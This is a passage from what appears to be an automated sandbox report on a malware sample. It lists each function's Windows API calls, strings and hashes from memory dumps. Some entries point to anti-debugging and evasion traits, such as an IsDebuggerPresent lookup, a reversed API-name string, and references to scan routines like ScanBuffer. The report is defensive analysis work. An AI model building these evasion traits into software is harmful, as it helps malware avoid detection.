                        • Part of subcall function 0285A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A762
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Locale$InfoThread
                      • String ID: eeee$ggg$yyyy
                      • API String ID: 4232894706-1253427255
                      • Opcode ID: 0e4bb6502c87fc4e6a6e5dcd18479249f7e6b8e985b661700816878456359e38
                      • Instruction ID: 162db9a62e8a61bbe3d1bd4d4af745232fcd9ba3ce6a37c00deb91cd97933117
                      • Opcode Fuzzy Hash: 0e4bb6502c87fc4e6a6e5dcd18479249f7e6b8e985b661700816878456359e38
                      • Instruction Fuzzy Hash: 0441F33C3041394BE709EF6C88C02BEB3EBDF85204B544726AD56C7344EA78DD498A63
                      Function 02868018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02868088,?,?,00000000,?,028679FE,ntdll,00000000,00000000,02867A43,?,?,00000000), ref: 02868056
                        • Part of subcall function 028680C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02868148,?,?,00000000,00000000,?,02868061,00000000,KernelBASE,00000000,00000000,02868088), ref: 0286810D
                        • Part of subcall function 028680C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02868113
                        • Part of subcall function 028680C0: GetProcAddress.KERNEL32(?,?), ref: 02868125
                      • GetModuleHandleA.KERNELBASE(?), ref: 0286806A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: HandleModule$AddressProc
                      • String ID: AeldnaHeludoMteG$KernelBASE
                      • API String ID: 1883125708-1952140341
                      • Opcode ID: a1b4e71efb64cbb4a8a49dc80e8f99f2ca434eb2e76093a4a690abe4db259aa4
                      • Instruction ID: 00e64ad12c58dd2fab8cf7623d5c59ecdb91e0850a679e76d7aae16a9d1b7134
                      • Opcode Fuzzy Hash: a1b4e71efb64cbb4a8a49dc80e8f99f2ca434eb2e76093a4a690abe4db259aa4
                      • Instruction Fuzzy Hash: 4BF0F67C644304AFEB02EFA8DC05E6E77EEFB097007910D20F804C3620D674AD048A63
                      Function 0286EFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(KernelBase,?,0286F3CC,UacInitialize,028B237C,0287B40C,UacScan,028B237C,0287B40C,ScanBuffer,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanString), ref: 0286EFCE
                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0286EFE0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: IsDebuggerPresent$KernelBase
                      • API String ID: 1646373207-2367923768
                      • Opcode ID: a636b940d1fc89ea2a393a28249f8be79a1b9d8a3736c9738fa90fd0fdeb259f
                      • Instruction ID: d1c08b425d24a9961082a8fc53203bf70380251f06dfa506e34b373cf462308b
                      • Opcode Fuzzy Hash: a636b940d1fc89ea2a393a28249f8be79a1b9d8a3736c9738fa90fd0fdeb259f
                      • Instruction Fuzzy Hash: ABD012AE3553701EB50076F81CC8C2D12CC8A5552A7601E60B127D65D3F66BC8651111
                      Function 0285C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0287D10B,00000000,0287D11E), ref: 0285C3FA
                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0285C40B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                      • API String ID: 1646373207-3712701948
                      • Opcode ID: 84563a073b6b0823ca4c62feb1a7205644fcece07ad310d59bd55c03ab225dd2
                      • Instruction ID: 6fb6537e1e276a6ebfb2b8463780b066b0311712068bb68dafe1515cd79c10c4
                      • Opcode Fuzzy Hash: 84563a073b6b0823ca4c62feb1a7205644fcece07ad310d59bd55c03ab225dd2
                      • Instruction Fuzzy Hash: 43D0A76CE403704EFB00AFB568C9E3626CC9704347F40D866EC05D5242E7B5C49C4F50
                      Function 0285E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0285E217
                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0285E233
                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0285E2AA
                      • VariantClear.OLEAUT32(?), ref: 0285E2D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: ArraySafe$Bound$ClearIndexVariant
                      • String ID:
                      • API String ID: 920484758-0
                      • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                      • Instruction ID: d21df3b3a8c9089ad57c5d5b63cee89d23871a8a3caca1bdcf5f2557ea41a675
                      • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                      • Instruction Fuzzy Hash: 7441D57DA016299BCB62DB68CC90BD9B3BDAF49214F0041D5EE4DE7215DA30AF808F61
                      Function 0285ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                      Download Yara Rule
                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0285ACD9
                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0285ACFD
                      • GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285AD18
                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0285ADAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FileModuleName$LoadQueryStringVirtual
                      • String ID:
                      • API String ID: 3990497365-0
                      • Opcode ID: 16db5c599ba56bf91da2b9c08b476f3c692e1809737bb6bb0c4e6c5076ede41a
                      • Instruction ID: ff2cf12716cbbb3e96eb682b26113adde5b3d6a097fc2025b1b3494cfa9712c2
                      • Opcode Fuzzy Hash: 16db5c599ba56bf91da2b9c08b476f3c692e1809737bb6bb0c4e6c5076ede41a
                      • Instruction Fuzzy Hash: A941217CD402689BDB25EB68CCC4BDAB7FDAB18301F4441E6A948E7241DB74AF848F51
                      Function 0285ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                      Download Yara Rule
                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0285ACD9
                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0285ACFD
                      • GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285AD18
                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0285ADAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FileModuleName$LoadQueryStringVirtual
                      • String ID:
                      • API String ID: 3990497365-0
                      • Opcode ID: 7dbcd68b0e921ee81020c44a8bff2fd53e66924c239c16131f682006a1fc706d
                      • Instruction ID: 3c43c36ee6876bc4ea2022716e30ae73200e03279c6776ae522cdced067dfd44
                      • Opcode Fuzzy Hash: 7dbcd68b0e921ee81020c44a8bff2fd53e66924c239c16131f682006a1fc706d
                      • Instruction Fuzzy Hash: 9E41327CA402689BDB21EB68CC84BDAB7FDAB08301F4441E5A948E7241DB74AF848F51
                      Function 02851C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 481ec280e3cc78828300d3da900a593559592d309b2813141a3d3a95a1f3900d
                      • Instruction ID: 98a3061872d45b646325a428607df5437fce87e2b6173ad4bb08cd95791eb4e2
                      • Opcode Fuzzy Hash: 481ec280e3cc78828300d3da900a593559592d309b2813141a3d3a95a1f3900d
                      • Instruction Fuzzy Hash: 92A1276E7106200BE719AA7C9C883BDB3C2DBC4325F18827EE91DCB785EB68CD558751
                      Function 0285946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0285955A), ref: 028594F2
                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0285955A), ref: 028594F8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: DateFormatLocaleThread
                      • String ID: yyyy
                      • API String ID: 3303714858-3145165042
                      • Opcode ID: 67fb6e4d72cd263c767ffc6f9f40b4830f907d7c7c2bd751de0be5883ec64049
                      • Instruction ID: a82907f19649be05380b7a9d51ee82185c6200ea092caad8ad6d569e7ca9dd79
                      • Opcode Fuzzy Hash: 67fb6e4d72cd263c767ffc6f9f40b4830f907d7c7c2bd751de0be5883ec64049
                      • Instruction Fuzzy Hash: 3D215A7DA402389FDB11DFA8C841AAEB3F9EF08710F4140A5ED49E7250E7749E54CBA6
                      Function 02856444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AllocValue
                      • String ID: x$e
                      • API String ID: 1189806713-1771279499
                      • Opcode ID: 1161bda060d5b6ffa46754650b2e1871c423d164eb1da1778c303d7a537cb82b
                      • Instruction ID: 5c841f241157d847a1c71e43db8e3b4124607abe9f40e1e63c5a70682bd1a36e
                      • Opcode Fuzzy Hash: 1161bda060d5b6ffa46754650b2e1871c423d164eb1da1778c303d7a537cb82b
                      • Instruction Fuzzy Hash: 7FC012BCD403308AEB00BBB8904860A36ADEB00381B8488A4BD04CB198FB35C0148F12
                      Function 0286AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 0286AD90
                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 0286ADC0
                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 0286ADDF
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 0286ADEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Read$Write
                      • String ID:
                      • API String ID: 3448952669-0
                      • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                      • Instruction ID: 67ed562257bf1f73257018952e5ea52ad4cb40c55b7a356728b821060af4f998
                      • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                      • Instruction Fuzzy Hash: F321AFBD6402299BDB14DF69CC84BAE73E9EF40321F008111EE54E7380EB34E9119BA0